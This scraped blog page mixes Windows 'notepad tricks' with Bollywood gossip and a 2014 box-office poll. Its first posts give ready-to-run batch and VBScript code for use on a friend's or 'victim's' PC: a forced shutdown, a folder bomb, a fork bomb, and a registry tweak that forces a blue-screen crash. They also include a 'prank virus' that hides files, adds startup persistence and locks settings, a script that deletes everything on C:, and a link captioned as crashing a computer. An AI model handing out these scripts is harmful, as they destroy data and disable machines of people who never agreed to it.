Saturday, 29 August 2015

Save file as any name you want with .bat extension. Then open that file and you observe that how many times you write START in Notepad, the CMD console box is open same as number of START written in Notepad.

5. SHUTDOWN SYSTEM WITH MESSAGE ▼ 
This trick is used for shutdown your friend system, after display an message. When you friend or victim click on OK button, then the bat file force the system to shutdown. Follow these steps to turn off system.

  • Open Notepad.
  • Copy & paste the below code into Notepad.
@echo off
cls
msg * I  HATE YOU
shutdown -s -c "ERROR! YOU ARE HACKED"
 
  • Save the file with any name nut with .bat extension and close it.You can stop execution of file by typing "shutdown -a"  in RUN dialog box. 
 6. Crash a Computer with just a link▼

Click Here (http://tiny.cc/ibJUN) HAHAHAHA

7. Folder Bomber▼This batch file will create 3000+ folder in less than a minute.

Open your notepad and type the following codes.
@echo off
:top
md %random%
goto top

Save it as 3000.bat
Give this file to your friend and when he will click on that his nightmare will be started.

Above Code Explained.
@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and


%random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.

8. Fork Bomber▼

It is another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste
the below codes and save it as fork.bat
:s<br />start %0<br />%0|%0<br />goto :s<br />

9. Getting Blue Screen Of Death (BOSD)▼

You may be surprised to know that Windows has a built-in self-crashing mechanism (no pun intended). Though it is quite easy to crash a Windows box whenever

you doesn't want it to crash, it may be quite difficult to reproduce the scenario, when you desperately want your box crashed. So here we give you two methods to
crash your Windows box.
Method 1: Windows Built-in Self Crasher
This method produces the 'awesome' BSOD (Blue Screen Of Death) that you are no doubt familiar with. The PC gets locked up and the only way to recover is to

reboot it. Just follow these steps:
Run Regedit (Start -> Run -> regedit)
Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters
Create a new DWORD value with name CrashOnCtrlScroll and give it a value 1
Reboot the PC
Now whenever you want to see the cute blue screen (and crash your system), press and hold the Ctrl key on the right side of the keyboard and hit the Scroll Lock key twice.

10. Prank Virus▼

Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly.
@echo off
echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs
echo Set colCDROMs=oWMP.cdromCollection>>123.vbs
echo do>>123.vbs
echo if colCDROMs.count>=1 then>>123.vbs
echo for i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo For i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo End If>>123.vbs
echo wscript.sleep 5000>>123.vbs
echo loop>>123.vbs
echo DO>>1234.vbs
echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs
echo LOOP>>1234.vbs
copy /y 123.vbs C:\
copy /y 1234.vbs C:\
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoClose /t REG_DWORD /f /d 1
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticetext /f /d "YOR ARE BEEN SCREWED"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticecaption /f /d "B0zZ_ErR0r"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 123.vbs /d c:\123.vbs
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 1234.vbs /d c:\1234.vbs
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
start 123.vbs
start 1234.vbs
echo Code Smahser owns your computer!!>>c:\almasmalik.txt
echo Code Smahser owns your computer!!>>d:\almasmalik.txt
echo Code Smahser owns your computer!!>>e:\almasmalik.txt
msg * MAY YOUR COMPUTER "REST IN PEACE"

Hope this was informative, kindly post your views or comments on this article . Suggestions are welcomed.

Saturday, 7 February 2015

Best Notepad tricks probably you never heard

Notepad is the plain text editor which is very comfortable in creating basic text files. They are saved as .txt files which have no format of tags or styles and this type of notepad environment is used to write a source code in it in which suitable for editing system files to use in a DOS environment.
notepad-tricks
Notepad is not just a simple and plain text creating software it is a powerful one which we can use to create different types of hack commands, opening many extensions files and also creating own batch file programs. Here we are sharing top five notepad tricked which we summed up follow them carefully

Creating a Virus
This is the most powerful and top tricks in the notepad which we can create a dangerous virus that will format your Windows C drive
  • Open the Notepad from your windows system
  • Paste the below code given
@Echo off
Del C:\ *.* |y
  • After pasting the code save the file as bat
  • Now to format your C drive just open this file.
Make your PC speak
This trick is too funny and easy to create which we just have to paste a code, by this we can make our system speak that what we are typing.So, follow the below steps
  • Open the Notepad from your windows system
  • Paste the below code given
Dim message, sapi
message=InputBox(“What do you want me to say?”,”ATT Text To Speak”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak message

  • After pasting the code save the file as vbs
  • Now, open the saved file then a window opens which you have to type anything you want and press OK button then your system speaks.
Matrix Effect
Follow the below steps carefully to create a matrix like effects in your Notepad
  • Open the Notepad from your windows system
  • Paste the below code given
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
  • After pasting the code save the file as bat
  • Then open the saved to see the matrix effect.

Make your Keyboard lights dance
This trick will make your keyboard’s three lights (Num Lock, Caps Lock, Scroll Lock) on and off randomly in which these will create a dancing light effect. Follow the below steps given below
  • Open the Notepad from your windows system
  • Paste the below code given
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
  • After pasting the code save the file as vbs
  • Then open your saved file which you can experience the amazing dancing light effect.
Create your Diary
This the most important trick and people having habit of writing Diary will love this. It creates your own diary in which if we write any information in it is saved automatically with date and time. Follow the below steps given below to create your diary
  • Open the Notepad from your windows system
  • Here no code is pasted just type .LOG in your Notepad
  • Save the file as txt
  • That’s it this is very easy to create now, open it and write anything it will be saved automatically with date and time.
And you are done. Please let us know if you face any issues through comments.

Thursday, 11 December 2014

Thursday, 20 November 2014

Thursday, 3 July 2014

Wednesday, 2 July 2014

Poll: Which Movie Will Be The Biggest Hit Of 2014?

2014 saw number of hit movies. However, we haven’ seen a blockbuster yet. We all expected Salman Khan’s Jai Ho to be the blockbuster of the year but the movie disappointed viewers with its box office performance. Though it is the biggest grosser yet, it has collected only 116 crores nett in India, whereas few of the top 5 ‘all time grossers’ are in the 200 crore club already. So, it was a much disappointing performance.
The 100 crore movies of the year are: Jai Ho, Holiday & 2 States. (Jai Ho & Holiday crossed 110 crore mark whereas 2 States just crossed 100 crore mark)
Which will be the biggest hit movie of 2014?
Which will be the biggest hit movie of 2014?

Other top groosers are: Gunday, Humshakals, Queen, Main Tera Hero, Heropanti & Ragini MMS 2.
Right now, Ek Villain is doing brisk business, but it’s not going to be one of the blockbusters with the potential to cross 150 crore mark since the screen count is less.
So, we have pinpointed our expectations on the slew of big releases awaiting us in the 2nd half of 2014. Which are those those big movies with the potential to be the biggest hit of the year? Let’s take a look!
Kick: Salman Khan’s Kick is expected to be a huge hit, especially since it’s getting released during Eid. The trailer and music are already hits. Given Salman Khan’s clout on mass audience, we expect this to be a huge blockbuster. It also stars Jacqueline Fernandez!
Happy New Year: Shahrukh Khan & Deepika Padukone’s Happy New Year is expected to be the Diwali blockbuster of the year. Farah Khan and Shahrukh Khan team gave us two super hits already, and the movie comes after Shahrukh Khan’s blockbuster Chennai Express. So, all the eyes are on the movie!
Bang Bang: Hrithik Roshan & Katrina Kaif’s Bang Bang is one of the biggest and most anticipated releases of the year. This action thriller has got the potential to be a blockbuster. We expect this film to collect anything between 100 and 200 crore.
P.K.: Aamir Khan & Rajkumar Hirani team is back after their blockbuster outing ’3 Idiots’ in 2009! This movie has blockbuster written all over it. Will it be the blockbuster we all have been waiting for? Will it cross the record of Dhoom 3?
So, which movie will be the biggest blockbuster of 2014?
Vote below!
Which movie will be biggest grosser of 2014?
  • Kick (33%, 629 Votes)
  • Happy New Year (27%, 515 Votes)
  • Bang Bang (20%, 389 Votes)
  • P.K. (20%, 374 Votes)
Total Voters: 1,907

Kapil Sharma and Kamaal R Khan get into a Twitter war

Kamaal R Khan, popularly known as KRK, is back to doing what he is best at - trolling various celebrities.
After tweeting nonsense about celebs like Sunny Leone, Shah Rukh Khan, Aamir Khan, KRK got into Twitter war with comedian Kapil Sharma.View image on Twitter
View image on Twitter 
He further tweeted that he is just reciprocating to what Kapil Sharma tweeted or said about him.
 
  Kamaal R Khan KRK @kamaalrkhan
I never ever attack anybody. But yes I always defend myself. Krishna Ji said ki Zulm karna Bhi Gunah Hai n Zulm Sahna Bhi.

 
Kamaal R Khan KRK @kamaalrkhan
If somebody attacks me n threaten me 2break my teeth n house then how do you ppl expect me to keep quiet? I am not here to become a victim.
  

The fight reportedly started with KRK posting about Kapil and his YRF film. Kamaal had posted, "When YRF asked @NargisFakhri to do film with @KapilSharmaK9 She was laughing loudly n said sorry I don't have dates." But that was not all, he further posted, "SMS of Nargis- I was shocked to hear offer of YRF to do film with comedian Kapil Sharma. I think they forgot tat I was launched with Ranbir."